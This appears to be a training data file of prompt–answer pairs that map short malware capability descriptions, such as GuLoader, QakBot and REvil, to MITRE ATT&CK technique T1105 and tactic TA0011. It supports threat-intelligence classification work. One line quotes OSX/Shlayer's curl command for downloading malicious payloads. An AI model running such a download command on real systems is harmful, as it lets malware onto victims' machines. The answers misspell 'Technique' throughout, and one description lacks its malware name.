+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can download additional plug-ins to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gold Dragon can download additional components from the C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldMax can download and execute additional files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldenSpy constantly attempts to download and execute files from the remote C2, including GoldenSpy itself if not found on the system.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can download its second stage from a hardcoded URL within the loader's code.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GreyEnergy can download additional modules and payloads.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent has the ability to download and execute additional payloads.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GuLoader can download further malware for execution on the victim's machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: H1N1 contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: can download and execute a second-stage payload.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT has the ability to connect to a remote host in order to upload and download files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HTTPBrowser is capable of writing a file to the compromised system from the C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hancitor has the ability to download additional files from C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Helminth can download additional files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hi-Zor has the ability to upload and download files from its C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HiddenWasp downloads a tar compressed archive from a download server to the system.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hikit has the ability to download files to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has downloaded additional scripts that build and run Monero cryptocurrency miners.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant has the ability to upload a file from the command and control (C2) server to the victim machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq creates a backdoor through which remote attackers can download files and additional malware components.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HyperBro has the ability to download additional files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID has the ability to download additional modules and a configuration file from C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer downloads a shellcode payload from a remote C2 server and loads it into memory.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can upload files to the victim's machine for operations.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ixeshe can download and execute additional files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JHUHUGIT can retrieve an additional payload from its C2 server. JHUHUGIT has a command to download files to the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JPIN can download files and upgrade itself.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JSS Loader has the ability to download malicious executables to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Javali can download payloads from remote C2 servers.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KARAE can upload and download files, including second-stage malware.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KEYMARBLE can upload files to the victim’s machine and can download additional payloads.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY has the ability to download and execute code from remote servers.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS has executed a PowerShell command to download a file to the system.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI can download files and execute them on the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kasidet has the ability to download and execute additional files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar downloads additional plug-ins to load on the victim’s machine, including the ability to upgrade and replace its own binary.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kerrdown can download specific payloads to a compromised host based on OS architecture.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kessel can download additional modules from the C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin can download files to the compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KeyBoy has a download and upload functionality.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kinsing has downloaded additional lateral movement scripts from C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kivars has the ability to download and execute files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can download additional files and tools.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs downloads additional files from C2 servers.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LOWBALL uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron has the ability to download and execute additional files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Linfo creates a backdoor through which remote attackers can download files onto compromised hosts.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LiteDuke has the ability to download files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LitePower has the ability to download payloads containing system commands to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar can download additional plugins, files, and tools.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot downloaded several staged items onto the victim's machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoudMiner used SCP to update the miner from the C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can download and execute a replica of itself using certutil.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MCMD can upload additional files to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa has downloaded additional files, including an exploit for used privilege escalation.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete can download additional files for execution on the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can download additional files onto the compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can download additional files and tools from its C2 server, including through the use of BITSAdmin.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MechaFlounder has the ability to upload and download files to and from a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Melcoz has the ability to download additional files to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has used MSI files to download additional files to execute.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor has the ability to download additional files for execution on the victim's machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Micropsia can download and execute an executable from the C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan has received files from C2 and stored them in log folders beginning with the character sequence `a9850d2f`.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MiniDuke can download additional encrypted backdoors onto the victim via GIF files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mis-Type has downloaded additional malware and files onto a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Misdat is capable of downloading files from the C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mivast has the capability to download and execute .exe files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MobileOrder has a command to download a file from the C2 server to the victim mobile device's SD card.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoleNet can download additional payloads from the C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mongall can download files to targeted systems.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: More_eggs can download and launch additional payloads.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mosquito can upload and download files to the victim.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NDiskMonitor can download and execute a file from given URL.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can downloaded payloads from C2 to the compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NOKKI has downloaded a remote module for execution.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanHaiShu can download additional files from URLs.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanoCore has the capability to download and activate additional modules for execution.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NavRAT can download files remotely.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nebulae can download files from C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Neoichor can download additional files onto a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nerex creates a backdoor through which remote attackers can download files onto a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nidiran can download and execute files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub can load multiple additional plugins on an infected host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX/Shlayer can download payloads, and extract bytes from files. OSX/Shlayer uses the curl -fsL ""$url"" >$tmp_path command to download malicious payloads into a temporary directory.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D has a command to download and execute a file on the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Octopus can download additional files and tools onto the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum has built-in commands for uploading, downloading, and executing files to the system.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE can download files from its C2 server to the victim's machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Orz can download files onto the victim.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OutSteel can download files from its C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P.A.S. Webshell can upload and download files to and from compromised hosts.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P8RAT can download additional payloads to a target system.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLAINTEE has downloaded and executed additional plugins.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLEAD has the ability to upload and download files to and from an infected host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POSHSPY downloads and executes additional PowerShell code and Windows binaries.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSOURCE has been observed being used to download TEXTMATE and the Cobalt Strike Beacon payload onto victims.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS can retrieve and execute additional PowerShell payloads from the C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER can download or upload files from its C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CostaBricks can download additional payloads onto a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHBUGGY can download additional files and payloads to compromised hosts.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pandora can load additional drivers and files onto a victim machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pasam creates a backdoor through which remote attackers can upload files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Penquin can execute the command code do_download to retrieve remote files from C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peppy can download and execute remote files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon can install additional modules via C2 commands.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pisloader has a command to upload a file to the victim machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX has a module to download and execute files on the compromised machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has the ability to copy files and download/upload files into C2 channels using FTP and HTTPS.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoisonIvy creates a backdoor through which remote attackers can upload files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PolyglotDuke can retrieve payloads from the C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pony can download additional files onto the infected system.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerDuke has a command to download a file.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerLess can download additional payloads to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerPunch can download payloads from adversary infrastructure.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Psylo has a command to download a file to the system from its C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pteranodon can download and execute additional files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can upload and download to/from a victim machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has the ability to download additional components and malware.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT can download files to the victim’s machine and execute them.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuietSieve can download and execute payloads on a target host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RARSTONE downloads its backdoor component from a C2 server and loads it directly into memory.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RATANKBA uploads and downloads information.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession has the ability to drop additional files to an infected machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT can download files via DNS.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can download a copy of itself from an attacker controlled IP address to the victim machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RGDoor uploads and downloads files to and from the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can retrieve additional malicious payloads from its C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM can download additional files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay can download files to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RedLeaves is capable of downloading a file from a specified URL.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RegDuke can download files from C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remcos can upload and download files to and from the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RemoteCMD copies a file over to the remote system before execution.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RemoteUtilities can upload and download files to and from a target machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec contains a network loader to receive executable modules from remote attackers and run them on the local victim. It can also upload and download files over HTTP and HTTPS.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Revenge RAT has the ability to upload and download files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RogueRobin can save a new file to the system from the C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: S-Type can download additional files onto a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to download a DLL from C2 to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SEASHARPEE can download remote files onto victims.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SHARPSTATS has the ability to upload and download files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SHUTTERSPEED can download and execute an arbitary executable.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can load additional files and tools, including Mimikatz.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RAPIDPULSE can transfer files to and from compromised hosts.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA has downloaded files onto a victim machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOWDRIFT downloads additional payloads.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM has used Powershell to download UltraVNC and ngrok from third-party file sharing sites.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SQLRat can make a direct SQL connection to a Microsoft database controlled by the attackers, retrieve an item from the bindata table, then write and execute the file on disk.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STEADYPULSE can add lines to a Perl script on a targeted server to import additional Perl modules.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST delivered different payloads, including TEARDROP in at least one instance.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady has the ability to download additional tools such as the RedLine Stealer to an infected host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot can download additional files onto a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sakula has the capability to download files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
